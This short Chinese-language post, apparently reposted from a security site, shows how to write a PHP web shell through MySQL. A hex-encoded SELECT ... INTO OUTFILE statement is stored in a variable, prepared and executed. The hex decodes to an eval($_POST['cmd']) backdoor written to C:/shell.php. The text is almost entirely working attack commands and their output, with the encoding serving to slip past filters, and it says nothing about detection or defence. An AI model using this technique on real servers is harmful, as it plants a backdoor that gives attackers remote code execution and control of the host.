mysql多语句写shell

mysql> use xssdb;
Database changed
mysql> set @a=0x73656C6563742030783343334637303638373032303430363537363631364332
38323435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
Query OK, 0 rows affected (0.00 sec)

mysql> prepare cmd from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

mysql> execute cmd;
Query OK, 1 row affected (0.00 sec)

上面加密的十六进制是:

select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile ‘C:/shell.php’

本文摘自黑面小窝由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.